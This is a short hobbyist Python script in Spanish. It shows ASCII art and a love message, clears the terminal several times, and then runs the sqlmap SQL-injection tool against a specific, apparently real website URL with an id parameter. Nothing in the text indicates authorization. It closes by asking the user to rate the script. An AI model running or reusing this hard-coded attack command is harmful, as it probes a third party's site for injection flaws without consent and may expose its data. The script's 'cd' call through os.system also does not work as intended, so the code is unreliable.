import os
import time

time.sleep(0.2)
print("""

_________▓▓▓▓____█████████
__ Ƹ̵̡Ӝ̵̨̄Ʒ▓▓▓▓▓=▓____▓=▓▓▓▓▓
__ ▓▓▓_▓▓▓▓░●____●░░▓▓▓▓
_▓▓▓▓_▓▓▓▓▓░░__░░░░▓▓▓▓
_ ▓▓▓▓_▓▓▓▓░░♥__♥░░░▓▓▓
__ ▓▓▓___▓▓░░_____░░░▓▓
▓▓▓▓▓____▓░░_____░░▓
_ ▓▓____ ▒▓▒▓▒___ ████
_______ ▒▓▒▓▒▓▒_ ██████
_______▒▓▒▓▒▓▒ ████████
_____ ▒▓▒▓▒▓▒_██████ ███
_ ___▒▓▒▓▒▓▒__██████ _███
_▓▓X▓▓▓▓▓▓▓__██████_ ███
▓▓_██████▓▓__██████_ ███
▓_███████▓▓__██████_ ███
_████████▓▓__██████ _███
_████████▓▓__▓▓▓▓▓▓_▒▒
_████████▓▓__▓▓▓▓▓▓
_████████▓▓__▓▓▓▓▓▓
__████████▓___▓▓▓▓▓▓
_______▒▒▒▒▒____▓▓▓▓▓▓
_______▒▒▒▒▒ _____▓▓▓▓▓
_______▒▒▒▒▒_____ ▓▓▓▓▓
_______▒▒▒▒▒ _____▓▓▓▓▓
________▒▒▒▒______▓▓▓▓▓
________█████____█████
_'▀█║────────────▄▄───────────​─▄──▄_
──█║───────▄─▄─█▄▄█║──────▄▄──​█║─█║
──█║───▄▄──█║█║█║─▄║▄──▄║█║─█║​█║▄█║
──█║──█║─█║█║█║─▀▀──█║─█║█║─█║​─▀─▀
──█║▄║█║─█║─▀───────█║▄█║─▀▀
──▀▀▀──▀▀────────────▀─█║
───────▄▄─▄▄▀▀▄▀▀▄──▀▄▄▀
──────███████───▄▀
──────▀█████▀▀▄▀
────────▀█▀
""")
time.sleep(2)
os.system("clear")
time.sleep(1.3)
print(""" thayra te re amo
                                                                                          
                          """)
time.sleep(1.2)
os.system("ls")
os.system("clear")
time.sleep(0.2)
os.system("clear")
os.system("cd sqlmap-dev")
time.sleep(0.2)
os.system("clear")
os.system("ls")
time.sleep(0.2)
os.system("clear")
os.system("python3 sqlmap -u http://www.asfaa.org/member.php?id=20")
os.system("clear")
time.sleep(0.3)
print("a)muy bueno tu script;D")
print("b)mas o menos ;)")

a =str(input("inserta la opcion que vas a elegir>>>"))
if a=="a":
	print("ooohh :o la verdad la idea de este script es que sea una herramienta automatizada hecha con el sistema os")
	
else:
	print("gracias por dar tu opinion asi podre mejorar,en el ambito de la programacion.")
os.system("clear")
try:
		time.sleep(0.4)
		print("GRACIAS POR EJECUTAR MI SCRIPT:3")
		
finally:
	print("programa finalizado")
